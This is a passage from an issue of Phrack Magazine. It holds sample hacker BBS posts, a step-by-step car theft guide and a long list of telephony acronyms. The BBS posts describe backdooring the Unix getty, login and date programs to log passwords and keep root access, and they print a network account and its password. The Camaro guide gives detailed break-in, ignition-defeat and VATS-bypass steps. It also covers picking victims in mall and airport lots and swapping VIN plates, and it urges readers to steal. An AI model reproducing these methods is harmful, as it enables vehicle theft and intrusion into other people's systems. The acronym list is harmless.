%> Left by: The Urvile [Level: 8]

for getty, just check and see if the first entry is , where that is your back door, of sorts. the init program will have to be a bit (?) larger than the original, considering that you'll have to put in the stuff to make it set up your environment & exec /bin/sh.

login, on the other hand, can put a backdoor in the gpass() routine, which can conveniently write the passwds to a file. not too useful to have lots of passwds in an already backdoored system, you say? bull. there are lots of southern bell systems i've gotten into by using the same passwds as the hacked system. also, what if they remove the backdoor? too bad, it'll take you an hour or so to put the source up & modify it again.
one thing that i've been thinking about: on a system, backdoor getty, login, (for the reasons cited above), and something like 'date', to check 1) if root is using the program, and 2) to see if your handy dandy login has been erased, and put it back if 3) a day or so has elapsed from the last call of the 'date'. well, i thought it was a good idea. much better than using cron & whatever to put a username in the passwd file.

encryption on cosmos: it's strange, to be sure. i tried putting a 404 cosmos passwd on your 602 cosmos. The user id's were different, the versions of cosmos were different, i think, but the username was the same. has anyone ever seen ANY (no matter how old) cosmos login source?

incidentally, is anyone doing anything on sbdn of late? scanning for addresses is generally a bad idea.

*** {SPCS/OSS Information Sub-Board} ***
*** {Stored Program Control Systems / Operations Support Systems} ***

%> Sub-board: SPCS/OSS Information
%> SubOp: ANI Failure
%> Messages: 97
%> Files: 1

%> Message: 19 of 97
%> Title: DMS
%> When: 12/28/88 at 10:20 am
%> Left by: Epsilon [Level: 8]

I found out some things about DMS if anyone's interested.

I only spent a little while looking around, but I managed to figure out that the DMS does indeed have a sort of tree structure. I haven't figured out the structure of TABLES yet, but I kind of know how the rest works. Watch..

Ok, from the > you can enter tasks, (I prefer to call them toolboxes because they're like little tools you can run to perform different things.) For instance, you have one called LOGUTIL which is some sort of utility that keeps tabs on various things, and you can view the logs kept. After you have entered LOGUTIL, you can type LIST LOGUTIL and it'll spool out commands. You can also type LIST LOGS to see a list of logs that are kept.

The next thing I was fooling with was SERVORD, which is obviously some type of Service Order processing software.
This toolbox is much friendlier, as it does include the help command, and it provides help on the syntax of each command. Unfortunately, it does not give each parameter for each command. I'm sure that would take up quite a lot of space. I think you're going to need a manual to really do anything cool with SERVORD, but hey..

Sorry if you people knew all of this already. I guess I'll keep posting about it as I learn more. Sheesh. Lame post.

Epsilon
____________________________________________________________________________

*** {Userlist as of Mid-May it seems} ***

%> Black Ice Private User List <%

Name                             Level      Status       Posts     Last on
===============------------------=====------======-------=====-----=======--
System Operator                    11       Sysop           33     5/16/89
The Mentor                         11       Sysop           59     5/16/89
Epsilon                             8       Charter        106     5/8/89
The Prophet                         8       Charter         59     5/15/89
ANI Failure                         8       Charter        220     5/6/89
The Urvile                          8       Charter         71     5/4/89
Doc Cypher                          8       Charter         56     5/13/89
Lex Luthor                          8       Charter         21     5/10/89
The Leftist                         8       Charter         20     5/14/89
Erik Bloodaxe                       8       Charter         75     5/17/89
Empty Promise                       8       Charter         16     5/5/89
Generic 1BED5                       8       Charter         46     5/16/89
Skinny Puppy                        8       Charter         93     4/23/89
Jester Sluggo                       8       Charter         32     5/13/89
Red Eye                             8       Charter         31     5/2/89
The Marauder                        8       Charter          9     5/12/89
Ferrod Sensor                       8       Charter         10     3/30/89
____________________________________________________________________________

*** {Tymnet (Packet Switching Network) Sub-Board} ***

%> Sub-board: Tymnet
%> SubOp: Lex Luthor
%> Messages: 48
%> Files: 0

%> Message: 36 of 48
%> Title: isis and elf
%> When: 3/25/89 at 12:37 am
%> Left by: Lex Luthor [Level: 8]

I believe ANI was correct about the acronym for ISIS. Internally Switched Interface System

I think it is the go between from the engine to the node code. Kind of like how assembly is the go between my apple and basic.

ELF - Engine Load Facility. This is a program that transfers and loads code into a TYMNET Engine node.

ISIS has slots, in each slot a program (node code) can run.
This node code is different for different tasks. I should clarify the above, only one 'application' ie: gateway, tymcom, whatever, can run on isis, and usually is found on slot 0. But other programs can be run on other slots. Programs that allow you to log into the slot and do things. like DDT - Dynamic Debugging Tool.

All this and more will be explained in my upcoming (hopefully) file on Tymnet called-- Anatomy of a Packet Switching Network: MDC's TYMNET.

inter-link cleared from VALTDNET (C) H9 N4067 to TYMNET (C) H5981 N7347
inter-link cleared from H1 N2010 TESTNET to H1 N2200 BUBBNET
inter-link cleared from TYMNET (F) H5277 N6420 to BUBBNET (F) H15 N2324
inter-link cleared from AKNET to TYMNET
inter-link cleared from TYMNET to AKNET
inter-link cleared from TRWNET to PUBLIC TYMNET
inter-link cleared from PUBLIC TYMNET to TRWNET

please log in: DECLOD
Password: DECLODH
Interlink established from TYMNET to TSN-NET
Please log in: Gomer T. Geekster

--Lex

%> Message: 44 of 48
%> Title: ontyme II
%> When: 4/4/89 at 1:15 am
%> Left by: Lex Luthor [Level: 8]

The system used for setting up the DECLOD acct was TYMVALIDATE which isn't exactly the same as NETVAL but close.

Be careful with ONTYME II, since it automatically updates ALL files you read. So if you read some files in that person's personal directory, they can see that either someone has their acct/pass or someone is using IMITATE and reading their stuff. Me and Skinny Puppy are working on a way to defeat this....

Lex

%> Message: 47 of 48
%> Title: INTL TYMNET
%> When: 4/21/89 at 1:17 pm
%> Left by: Skinny Puppy [Level: 8]

International Tymnet - how many of you have seen tymnet claiming that it serves over 65 countries, but don't really believe it? well, they do, sort of. There is a tymnet-europe called Mcdonnell Douglas Information Systems (MDIS). While I don't have any dialups for it, I have X.121 addresses in France and BeNeLuxKG. once you get there, you can type HELP and glean a lot of what is going on.
The interesting thing is that a lot of things that say ACCESS NOT PERMITTED from regular tymnet are actually european addresses and can be used on MDIS. for instance, ROMA (Italian for ROME), ESAIRS, and EURONET (which is a host selector for american public timesharing systems). While there doesn't seem to be a lot of european hosts, I am sure that if everyone on here pulled up all their old tymnet-hack sheets where they had things listed as ANP (My abbreviation for ACCESS NOT PERMITTED) and tried a few we could find something new.

Right now, I will only give out my French MDIS gateway - It is 208092020029. Figure out how to get there yourself. If you DO find anything interesting, leave me mail, and we can trade. I already have some internal MDIS systems there, if I can just figure out how to use them.

Coming Soon to a Board not so near to you: NISNET (tymnet-japan) and the Caribbean tymnets.

Until then, ASSIMILATE

Skinny Puppy
21 april 1989
_____________________________________________________________________________

%> Sub-board: Vocal Hacking
%> SubOp: ANI Failure
%> Messages: 45
%> Files: 0

%> Message: 3 of 45
%> Title: Operator engineering
%> When: 12/6/88 at 12:43 am
%> Left by: Ferrod Sensor [Level: 8]

To answer ANIF's question, I have been doing some TSPS/TOPS engineering lately for a variety of purposes, one of which is a bit far fetched but has possibilities. I am trying to find a way to possibly freeze an operator console (the method I am trying is actually simpler than it sounds). It involves getting the op to connect to a short circuit test code, either by ACS (key) or by OGT (outgoing trunk) outpulsing sequence.
There are a few flaws in this though, the main one being the more than likely possibility of the Op simply releasing the console position (even though the short circuit, when dialed, cannot be hung up on, the caller must wait for it to time out (about three minutes or so). If this was the case, then the result could be the Operator having an inaccessible outgoing line for a short period of time, which wouldn't affect much with the actual console.. The things I tried recently with this didn't result in much, but if I take into account TOPS/TSPS RTA (Remote Trunking Arrangements) setups (where a caller from one area code, with a 0+ or 0- call, may be connected to an operator in a site in a different NPA. Test codes are different, even in exchanges, so an operator site in a different NPA wouldn't be affected the same with a different code.

The overall purpose to this would be to create a certain condition with the operator network that could be used to gain information when investigated, say by someone from Mtce. engineering or the TOPS/TSPS SCC or equivalents. There are other ways to start an engineer of course, but this is just something that's concrete (meaning you could get people to fish around for info a bit easier than coming in for a random request.

This is getting a bit long. I'll post more later about Operator engineering, something more immediately practical next time. The board looks promising.

Ferrod/LOD
______________________________________________________________________________

LOD Communications: Leaders in Engineering, Social and Otherwise ;)

Email: lodcom@mindvox.phantom.com
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
            603 W. 13th
            Suite 1A-278
            Austin, Texas USA 78701
______________________________________________________________________________

End Sample H/P BBS Messages File

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 20 of 27

[** NOTE: The following file is presented for informational purposes only. Phrack Magazine takes no responsibility for anyone attempting the actions described within. **]

-----------------------------------------------------------------------------

The Step-by-Step Guide to Stealing a Camaro

by Spy Ace
spyace@mindvox.phantom.com

PURPOSE: To describe step-by-step, with specificity, exactly how the average person might accomplish with skill and alacrity, the theft of a motor vehicle, particularly 1982-1993 Chevrolet Camaros, Pontiac Firebirds and similar beasts.

MOTIVE: While I am a telecommunications enthusiast, I am also a basically honest, law-abiding working man. In 1989 an individual driving a borrowed automobile struck my only means of transportation, a 1986 Chevrolet Camaro, totalling it. My vehicle was parked and unoccupied at the time. In an amazing feat of legal maneuvering, and after protracted judicial proceedings, all parties involved managed to escape liability and I was left without a car or reimbursement. The insurance companies are lying, cheating scum. As a result, I took matters into my own hands and stole a replacement car.

I came to the conclusion that the justice system in this country exists only to protect the strong from the weak, the haves from the have-nots and the rich from the not rich. It has nothing to do with rectifying wrongs. It is therefore incumbent upon all aggrieved parties to seek personal satisfaction when the American legal system fails to provide it.

My motive is thus twofold:

1. To see the evil insurance companies screwed some more by sharing my knowledge of car-thieving techniques with those who might apply them.

2. To assist the little man in obtaining justice when he/she may be confronted with a situation similar to mine.

BACKGROUND: Before I stole my car, I conducted extensive research and talked to a number of individuals in the automotive repossession field, law-enforcement, and several auto mechanics. I assure the reader that everything contained in this file is true to the best of my knowledge and that I HAVE ACTUALLY DONE WHAT I AM WRITING ABOUT. I am not writing hypothetically; I speak from experience. I urge the reader, if he is serious about stealing a vehicle, to verify my research and find out much of this information for himself. Auto shops at local high schools/community colleges are excellent places to experiment and learn, and auto repossession specialists are invaluable sources of information.

------

So, you've decided to steal a car. How nice.

In this article I will be covering in detail exactly how I stole a 1988 Chevrolet Camaro to replace the 1986 of mine that was destroyed by an irresponsible driver. The techniques described herein will work on 1982 thru 1993 Chevy Camaros/Z28s/IROCs/Berlinettas and probably the same years Pontiac Firebirds and Trans Ams. With regard to the Pontiacs I cannot say for certain because I only experimented on Camaro variety cars since that is what I was after. The Pontiacs are very similar, however, and I believe this information to be applicable to them.

There are basically only two stages to obtaining possession of a vehicle. First, one must gain actual physical access to the inside of the car and second, one must disable the steering-lock mechanism and activate the ignition. Once these two things have been accomplished, the vehicle is yours, subject to the infuriated efforts of the owner to regain it.
It should be noted, of course, that there may be complications associated with either of these steps, such as alarm systems or the factory anti-theft mechanisms. I will deal with both of these in turn. First, gaining entrance to the vehicle. This will require one tool: a 24-inch aluminum "shop" ruler. I tried several and settled on the Pickett brand ACF-24, available in most art/blueprint supply stores. It consists of a 1.25x24x1/16 inch piece of aluminum. For maximum efficiency, it should have two slight bends to it. First, at 14 inches, bend it subtly to about 15 degrees. Then, at 19 inches on the ruler, bend it back so that the two sections are parallel. Like this: N _________________ W + E \_______ S Of course, the angle in this diagram is far too steep. Both angles should only be about 15 degrees. Hopefully, you get the idea. If not, you probably shouldn't be thinking about stealing a car. In any case, if you have succeeded in fashioning this, you are now armed with the only tool necessary to gain keyless entry into your soon-to-be new Camaro. The application of this tool is simple. Walk up to a Chevrolet Camaro of a year described above, position yourself at either door. FIRST: Check to see if the door is unlocked. You'd be surprised. If it isn't, you will need to insert the tool straight down, in between the rubber weather-stripping and the glass, approximately 4-5 inches from the back of the door, directly in line with the door-lock. Insert the tool such that the small section (see above diagram) is thrust down into the door (did I mention that stealing a car is very sexual? Never mind...). The small section of the tool should be bent TOWARDS you as you stand at the car. In the above diagram, north is towards the car, west is straight up in the air, east is straight down towards the inside of the door, and south is towards you as you stand at the car. Got the picture? If not, get a friend to explain it to you. 
The tool should go in about 16 inches until it catches the lock mechanism. If it goes in further than about 17 inches, withdraw and try again. Drive straight down, don't force, try moving your position an inch to the right or left. Eventually you will feel the lock mechanism. It will be rigid but a little spongy (epitome of GM engineering). Press down hard on the tool and let up. Try the door handle. Does it open? It probably will. If not, drive a little harder and keep trying the door. It will give eventually. WHY THIS WORKS: Well, this works for two reasons. First of all, General Motors is run by a bunch of cheap bastards and their cars are designed by engineers who couldn't find their asses with both hands. Basically, it's a shitty lock mechanism. It was designed shitty and the clods who sell us the piece-of-shit cars couldn't care less if they get stolen so they've never bothered to redesign the damn thing. In order to understand exactly why it works, the curious reader would be well advised to go to his local library and look in a Clymer or Chilton automotive repair manual for 1986 (or thereabouts) Camaro. In Chapter 12 of the Chilton, under "Body" (page 290 of mine) there is a magnificently concise exploded diagram of "Outside door lock assembly" which contains all the relevant information. The lock cylinder itself is connected to some linkage which activates the locking/unlocking mechanism. After a few months of normal use, this linkage develops some "slop" in it due to slight wear of the locking cylinder attachment. By pressing down on the linkage down inside the door, you are activating the (un)locking mechanism directly and there is enough play in the locking cylinder to allow it to give. Take a look at the diagram and you'll understand completely. Once I understood the locking mechanism, the deficiencies therein, and formulated an approach to overcoming it, I practiced on a friend's Camaro about a hundred times. 
If done properly and carefully, this will in no way harm any part of the car or locking mechanism. Try it on the driver's side first; this is usually the easiest because it has the most wear in the linkage. Then graduate to the passenger side door. Then try it out about a hundred times, then with your eyes closed, then while drunk, then with one hand tied behind your back. In a day or two you'll be able to get into a Camaro in less than ten seconds. A note about alarms: some clever individuals, in an effort to keep their prized vehicles from being stolen by the likes of you, have equipped them with a motion sensor or other devious device which tends to emit a shrill series of tones when aggravated. I suggest that before trying to open someone else's car, you first give it a good rocking back and forth in order to set off any alarm which might be present. Since it is not illegal (though it may be physically dangerous) to rock someone's car, it's always best to try this before actually breaking in. If the alarm screams, go on to some other victim. Personally, I have encountered very few alarms; the "it won't happen to me" attitude is still prevalent. Once you've gained physical entry into the vehicle, you are now ready for Step Two, ignition lock bypass. Unfortunately, this is a difficult step. I did a tremendous amount of research to determine the best way to deal with this problem and have developed an approach. It is by no means the only way to breach the ignition locking mechanism, but in my opinion it is the best. In developing this method I was most interested in several goals. First of all, I wanted an elegant solution; that is, something simple. Minimum tools and work required, and something that worked ALL THE TIME, not 50%. Second, I wanted an approach that could be accomplished quickly (for obvious reasons) and with minimum damage to the vehicle. 
Ideally, I wanted an attack which would not even be immediately obvious to someone (such as a cop) glancing in my car at a stoplight. Spending 30 minutes tearing apart the steering column might allow you to get the car started, but it won't meet the above criteria: speed, elegance, reliability, invisibility. The problem is that to do this requires a special tool and to get this tool one must either send away for it or have access to a machine shop to fabricate one. Neither of these is quick and easy, but the preparation is well worth it. Here's the basic idea. The General Motors vehicle uses an ignition locking mechanism called a "sidebar." This is basically one nasty piece of hardened fucking steel which blocks the lock cylinder from rotating when a properly-fitting key is not in place. It makes it impossible to simply "shear off the pins" by brute-force turning with a screwdriver or similar device. The solution is to use a tool capable of cracking the lock cylinder housing in which the sidebar sits. The cylinder housing itself is cast aluminum, which is considerably weaker than the sidebar itself, so when the proper force is applied it will be the housing which gives, not the sidebar. But no matter. First, get access to a Camaro, or for this exercise, just about any GM automobile since 1978 (the year they got the bright idea to put a locking screw in to keep people from just ripping the whole ignition lockset right out -- but that's a whole different story...). My favorite place to experiment on cars without being observed (and in fact legally) is to go to a local self-serve auto-wrecking "You Pull It" yard. They have these in many cities around the fruited plains; you pay a buck or two to get in and then go pluck parts from rotting American classics. If you don't drag any parts out, you can basically tear apart all the cars you want for a buck. 
If you don't have a You-Pluck-It nearby or are philosophically opposed to vehicular cannibalism, then use the method previously described to break into someone's Camaro for this. Once you have access to a GM (preferably a Camaro), get a screwdriver out and pry the outer ring off of the ignition set. The ring I'm talking about is the thing with the two tabs on it for your fingers to turn when you rotate the ignition to start the car. Just pry that sucker off of there -- it comes off very easily as it is affixed by two small gripping tabs. I can usually remove it by hand, but it's easiest to simply pry gently with a screwdriver. After you have pried that off of the ignition set, take a look. You'll see the ignition cylinder (with the keyway), the outer housing, and the actual ignition activation mechanism, which has two slots in it (where the outer ring fit into before you pried it off). This ignition linkage, with the two tabs, is what turns when a fitting key is inserted into the keyway and then turned. Note that in a GM ignition set, a fitting key serves only to withdraw the sidebar to allow the outer ignition mechanism to turn. The problem is to overcome the sidebar which prevents the ignition from turning. Fortunately, there is a tool for this very purpose. It is manufactured by Briggs and Stratton (yes, the lawn mower engine people) who happen to also make the locksets for GM. They make the locks. They make the tool to break the locks. You figure it out. Anyway, this neat little device is called a "GM Force Tool". I got mine from LDM Enterprises in Van Nuys, California (where else?) and it ran me about $90. Their fone number is 800-451-5950 and you should probably tell them that you're in the automotive repossession business if you go to order one of these. If they won't sell you one (because someone at GM read this article and hopped up and down) then simply go down to a local repo man and pay him an extra $25 to order one for you. 
Most of those guys are pretty sleazy and will do just about anything for a buck. If you have access to a machine shop and are reasonably competent, go ahead and make one. I will attempt a description. Don't feel stupid if you don't get this; it's difficult to describe it in text. Drop me E-mail and I'll send you a .GIF of the fucking thing. Anyway, it looks basically like a socket with very thin walls and two small tabs which fit into where the thumb-ring-thing used to go. You tap it onto the ignition set, into the two slots and the outside walls of the tool fit very snugly around the outside of the locking mechanism to keep it from splitting apart as you turn it. On the other end of the tool is a 1/2 inch square hole for a ratchet. Got the idea? Tap it onto the ignition, attach a healthy sized ratchet and turn slowly but forcefully. After about 30 degrees of turn the sidebar will crack the ignition lock housing and the whole mechanism will freely turn. If you don't understand this, take a look at a GM ignition (sans outer ring) and the facts will become readily apparent. If you have access to a machine shop, it is a simple matter to make one of these tools. Go to your local GM dealer and buy a whole ignition set, snap the outer ring off of there and take your measurements. Remember that the inner wall of the force tool must fit snugly around the lockset in order to keep it from splitting apart. That is why a device with simply two tabs which fit into the ignition linkage will not work (I tried it -- the metal is too soft and tears apart). Seem like too much work? Well, of course it is a bit of work, but preparation is the key! My father always stressed that the most important part of doing a job is having the right tools. The tools in this case are KNOWLEDGE of how all these goofy parts fit together and operate, a properly constructed force tool, and the patience to apply these two components to bring about the desired result. 
With some practice I was able to circumvent a Camaro ignition in just under 30 seconds. It does very little actual damage to the vehicle ($11.00 for a new ignition set) and in fact the thumb-ring-thing can be jammed back on and a key inserted and it will appear that everything is proper (in case you're pulled over by the local constable).

V.A.T.S.
--------

Because of the horrendous problems with car theft, particularly of Camaros, GM came up with a neat system boldly dubbed the "Vehicle Anti Theft System". Needless to say, as with most security devices, VATS accomplished little more than being a nuisance to vehicle owners and a minor inconvenience to car thieves. Here's how to defeat it.

First, basic theory of operation. The ignition of a VATS equipped vehicle (most 1988 and newer GMs, particularly the Camaros/Firebirds) is the same as the normal GM ignition except that it has an electronic sensor built in which requires activation by a resistor pack built in to the owner's key. There are fifteen possible resistor types, so each different VATS key that you have gives you a 6.7% chance of being capable of activating the ignition. The catch is that if you feed it the wrong one it will kill the ignition for 4 minutes. Thus, if you had a complete set of fifteen VATS keys, it would take you a maximum of one hour to run through them all. This is GM's idea of security: annoy the thief.

If you plan to tackle a VATS-equipped car, get a full set of the fifteen VATS keys. They're a few bucks each and you can get them from a locksmith or LDM. Obtain access to your target car in an area and in such circumstances as will allow you to work for an hour relatively undisturbed. In practice, this is not very difficult (more on that later). Once you have access to the vehicle and are satisfied that you can work unobserved, break the ignition lock using your force-tool as described above. Insert your first VATS key blank and attempt to start the vehicle.
If it will not activate the ignition, remove the key, wait four minutes and try the next one. Eventually you'll hit it. (Median hit time, of course: 30 minutes). Drive away.

Scouting a Victim
-----------------

An essential element of stealing a car without getting caught is picking out the right one. Again, preparation is the key. Once you've mastered the necessary techniques, start looking around for a good place to pick up a vehicle.

The car thieves that I spoke with told me that their preferred places are mall parking lots at night: there is a lot of activity so you probably won't be noticed lurking around waiting for a good prospect to show up. People usually go into the mall for several hours to buy crap, so you have time to work. Wait until no one is looking and pounce. Once you are inside the vehicle (which, with practice, may be accomplished in 15 seconds) you are home free. No one is going to pay any attention to you screwing around inside the vehicle and you'll be long gone by the time the owner finishes charging a new Salad Shooter on his American Express.

Another good place is airport parking lots. While they are often sporadically patrolled, it is in practice a simple matter to drive around until you spy the right vehicle, then pack all your necessary tools into a suitcase and walk from the terminal to the lot like a returning airline passenger. That's how I did it. The car was not reported stolen for over two weeks (it was in the long-term lot), giving me plenty of breathing room.

There are numerous other places. Start noting the places that you leave your car: supermarket, movie theater, in front of your house, at work, in a parking garage, etc. Start noticing patterns. That 1988 IROC you see parked in the same place for five hours every Tuesday.

When you actually commit the deed, BE PREPARED. Do a dry run. Be calm, work quickly but carefully. Act like you belong where you are -- don't lurk around nervously. Walk right up to the car and steal it.
If confronted by someone, try to talk your way out of it. Don't get violent: it's just a thing. A car is not worth hurting someone over. Don't worry about getting caught: most cities can't cope with the crime epidemic and do not bother to do much about auto theft.

What Do I Do With It?
---------------------

That's up to you. Take it for a joy ride. If you boosted it from an airport lot you can probably safely cruise around in it for a week or two. Go pick up bimbos and drive them to Las Vegas. Or sell the thing to a chop shop (you're on your own finding them; I have no experience with them). Tear it apart yourself and sell the parts. Drive it into the lobby of an insurance company building. Or go buy a Camaro of the same year and model that has been totalled out and switch the VIN plates once you have clear title. That's not a particularly difficult affair, although some skill is required to remove the VIN tags and install them in your new car.

Have fun! Stay out of trouble. If you have any questions, E-mail me. Above all, keep in mind that two things are essential to steal a car without getting caught: PRACTICE and PREPARATION.

Good luck!

-->Spy Ace<--
spyace@mindvox.phantom.com

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 21 of 27

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                             +
+                                                             +
+   The Telephony Acronyms and Abbreviations List from Hell   +
+                                                             +
+                                                             +
+                             by                              +
+                         Crisp GRASP                         +
+                                                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Well, here it is, the list from hell. Sure beats the old lists of 100 or so three letter acronyms. The whole reason for this list is so that you can crack almost ANY bell document. This list came from a few lists (one in Phrack a while back) and a few other Telephony lists here and there. Though it must be noted (and I want to take credit for it) that well over half of the acronyms and abbreviations were typed in by me, inputted into my database (of course I am not about to give out my database).
It is always a good idea to start a database, one will learn a lot faster. It is doing things scientific like, and for someone as compulsive as I, solving the puzzle of the telephone company was easy as pie. I must say that all the hackers I have meet, and talked to are all compulsive as hell . I think it is just what it comes down to, who is willing to learn. Any ways here is two fields in my database, one small part, but worth it. Though i do not think it will be able to help most of you out, just gets into too much, and understanding which acronym goes where, and understanding what goes where is hard. Well good luck! Greets to Bell Northern Labs, never see too much from you press wise! and to SRI, should have come to Cal. hah (Don knows what I am talking about, his funding is short) -------------------------------------------------------------------------- 15M Fifteen minutes 15S Fifteen seconds 1CF Singal party coing first pay phone 1FAC Interface packs 1FB One party flat business rate 1OF One party official (telco) business line 2SPDT Partial dial timeout in the second stage of a traditional 2-stage international 2SPST Permanent signal timeout in the second stage of a traditional 2-stage international 2SVCA Vacant code in the second stage of a traditional 2-stage international outbound 2W Two wire (pair) (circuit) 2WAY Two-way trunk groups 300 Log command menu (SARTS command) 376 Log clear (SARTS command) 384 Write log (SARTS command) 385 Read log (SARTS command) 399 Log print (SARTS command) 3KHZ Three kilohertz 3RNGR Three ringer 3WO Third wire open 4W Four wire (pair) (circuit) 600 Test menu (SARTS command) 600B 600-ohm briged connection 611 Detail tests (SARTS command) 621 Macro command menu (SARTS command) 631 Automatic test command (SARTS command) 735T 735-ohm compromise termination ?A Action field contains an error ?D Data field contains an error ?E Error exist in the message but can ot be resolved to the proper field ?I Identification field contains an 
error ?T Time-out has occured on channel ?W Warning message A A side (lead) (pair) A Area A Telephone number or trunk group and member number from trouble A/B Two wire phone connection (T&R) AA Automatic answer AA Packet analog access line INTER/TRA blocal 1-26 AABS Automatic alternate billing service AAE Auxiliary access equipment AAR Automatic alternate routing AAX Automated attendant exchange AB Packet switch trunk INTER/TRA blocal 1-26 ABATS Automatic bit access test system ABATS Automatic bit access test system (DDS service) ABC Automatic bill calling (TSPS) ABF Abandon failure ABF Abandon failure (MDII) ABHC Average busy hour calls ABL Auxiliary Buffer oder word Left half ABM Asynchronous balanced mode ( -> SABME) ABME ABM extended ABR Auxiliary Buffer order word Right half ABS Alternate billing service ABS Alternative billing service ABSBH Average busy season busy hour ABT Abort ABV Above AC Administrative computer AC Alternating current AC Assembly code ACA Asynchronous communication adapter ACB Annoyance call bureau ACB Automatic call-back ACC Audio communications controller ACCS Automated calling card service ACD Automatic call distribution ACD Automatic call distributor ACDA Automatic call disposition analyzer ACDN Access Directory Number ACDN Access directory number ACE Assignment change establish ACE Automatic calling equipment ACES Aris cabs entry system ACF Advanced communications functions ACFA Advanced CMOS frame aligner peb2030 ACG Automatic call gap ACH Attempt per circuit per hour ACI Answer controller interface (IOM2 monitor command) ACIA Asynchronous communications interface adapter ACK Acknowledge ACK No acknowledgement wink ACK No acknowledgement wink (MDII) ACKDB Acknowledgement database ACM Address complete msg. 
(SS7: in ISUP) ACOF Attendant control of facilities ACP Action point ACSE Association control service element ACSNET Acedemic computing services network ACSR Automatic customer station rearrangement ACSU Advanced T-1 channel service unit ACT AC Testing definition ACT AC testing definition ACT Activate ACT Active ACT Auto or automatic circuit transactions ACTS Automated coin toll service ACTV Acticated ACTVD Activated ACU Alarm control unit ACU Automatic calling unit AD Attendant INTER/TRA blocal 1-26 ADAP Audix data acquisition package ADAS Advanced directory assistance system ADC American digital cellular ADC Analog to digital converter ADCCP Advanced data communication controll procedure ADCCP Advanced data communications control procedure ADCI Automatic display call indicator ADD EXP Address expander ADDL Additional ADDR Address translations ADJ Ajust ADM Add-drop multiplex ADMA Advanced DMA controller SAB82258 ADN Abbreviated dialing number ADP Automatic diagnostic process. ADPCM Adaptive PCM ADS Administration of designed services ADS Administration of designed services review ADS Advanced digital system ADS Audio distribution system ADS Auxilary data system ADSL Asymmetrical digital subscriber line ADTS Automated digital terminal system ADTS Automatic data test system ADTS Automatic digital terminal system ADU Automatic dialing unit AERM Alignment error rate monitor AF Commercial audio fulltime INTER/TRA blocal 1-26 AFACTS Automatic facilities test system AFADS Automatic force adjustment data system AFE Analog front end AFI Authority and format identifier (ISO 7498) AFSC Advanced features service center AFSK Automatic frequency shift keying AG/EEE Above ground electronic equipment enclosures AGC Automatic gain control AGM Normal aging months AGND Analog ground AGT Accelerated aging type AI Activate indication (C/I channel code) AI Artificial intelligence AI Assigner's initials AI Automatic identified outward dialing INTER/TRA blocal 1-26 AIC Automatic 
intercept center AICC Automatic intercept communications controller AIN Advanced intelligent network AIOD Automatic id of outward dialing AIOD Automatic identifaction of outward dialing AIS Alarm indication signal AIS Alarm indication signals AIS Automatic intercept system AIT Analit initialization of tables AIU AI upstream AL Alternate services INTER/TRA blocal 1-26 ALATS Automatic loop access system system (DDS service) ALBO Automatic line buildout ALE Address latch enable ALE Automatic line evaluation ALFE Analog line front end ALGOL Algorhythmic computer language ALI Automatic location indentification ALIT Automatic line insulation testing ALL All events ALL All module controller maintenance interrupts ALL Turns on all IDs ALPT Alarm scan points ALRM Alarms ALRU Automatic line record update ALS Automated list service AM Administrative module AM Amplitude modulation AM Asynchronous multiplexer AM Packet AMA Automatic Message Accounting AMA Automatic message accounting AMACS AMA collection system AMAIRR Automatic message accounting irregularity AMALOST Lost automatic message accounting AMARC AMA recent change AMARC AMA recording center AMASE AMA standard entry AMAT Automatic message accounting transmitter AMATPS Automatic message accounting teleprocessing system AMATPS Automatic message accounting transmitter teleprocessing system AMC Add-on module connector (-> sipb) AMERITECH American information technologies AMI Alternate mark inversion code AML Automatic maintenance limit. AMP Advance measurement processor AMP Amplifier AMPS Advanced mobile phone service AMR Automatic meter reading AMWI Active message waiting indicator AN Announcement service INTER/TRA blocal 1-26 AN Associated number ANA Automatic number announcement ANC All number calling ANCT Analysis control table ANI Automatic number identification ANIF Automatic number identification failure ANM Answer msg. (SS7: in ISUP) ANS Answer ANS Answer On Bus ANS Answer msg. 
ANSER       AT&T Network Servicing System (i.e. via EADAS link)
ANSI        American national standards institute
AO          Allocation order
AO          International/overseas audio (full time) INTER/TRA blocal 1-26
AOC         Advice of charge (i.256 B)
AOSS        Auxiliary operator service system
AP          Access point
AP          Application (OSI layer 7)
AP          Application processor
AP          Attached processor
AP          Auxiliary processor
AP          Automatic position
AP          Commercial audio (part time) INTER/TRA blocal 1-26
AP-PG       Access point page
APC         Alarm processor circuit
APC         Amarc protocol converter
APD         Access point data
APD         Avalanche photo diode
APDB        Access point data base
APDL        Application processor data link
APH         Application protocol handler
API         Application interface
APM         Application processor modules
APPC        Advanced program to program communication (IBM)
APPL1-APPL5  Reserved for application handlers
APS         Automatic position system
APS         Automatic protection switch
APS         Automatic protection switching system
AQ          Autoquote problem.
AR          Activation request (C/I channel code)
AR          Alarm report
AR01        Office alarm - 1AESS alarm message -
AR02        Alarm retired or transferred - 1AESS alarm message -
AR03        Fuse blown - 1AESS alarm message -
AR04        Unknown alarm scan point activated - 1AESS alarm message -
AR05        Commercial power failure - 1AESS alarm message -
AR06        Switchroom alarm via alarm grid - 1AESS alarm message -
AR07        Power plant alarm - 1AESS alarm message -
AR08        Alarm circuit battery loss - 1AESS alarm message -
AR09        AMA bus fuse blown - 1AESS alarm message -
AR10        Alarm configuration has been changed (retired inhibited) - 1AESS
AR11        Power converter trouble - 1AESS alarm message -
AR13        Carrier group alarm - 1AESS alarm message -
AR15        Hourly report on building and power alarms - 1AESS alarm message
ARA         Automatic reservation adjustment
ARC         Administrative responsibility code
ARC         Alternate route cancellation
ARC         Alternate route cancellation control
ARC         Audio response controller
ARCOFI      Audio ringing codec filter
ARCOFI-SP   ARCOFI + speakerphone function
ARCOS       ARCOFI coefficient support program
ARCOTI      SIPB telephone module
ARD         AR downstream
ARG         Alarm reference guide
ARG         Assemble and run a given master file
ARIS        Audichron recorded information system
ARL         Activation request local loop (C/I channel code)
ARM         Activation request maintenance (C/I channel code)
ARM         Asynchronous response mode
ARM         Automatic R(emote test system) maintenance
ARMAR       Automatic request for manual assistance resolution
ARN         Activation request
ARQ         Automatic repeat request
ARR         Automatic ring recovery.
ARS         Alternate route selection
ARS         Automatic route selection
ARSB        Automated repair service bureau
ARSB        Automatic repair service bureau
ARSSI       Automatic route selection screening index
ART         Audible ringing tone
ARU         Activation request upstream
ARU         Audio response unit
ASAP        As soon as possible
ASC         Alarm and status circuit
ASC         Alarm and status circuit.
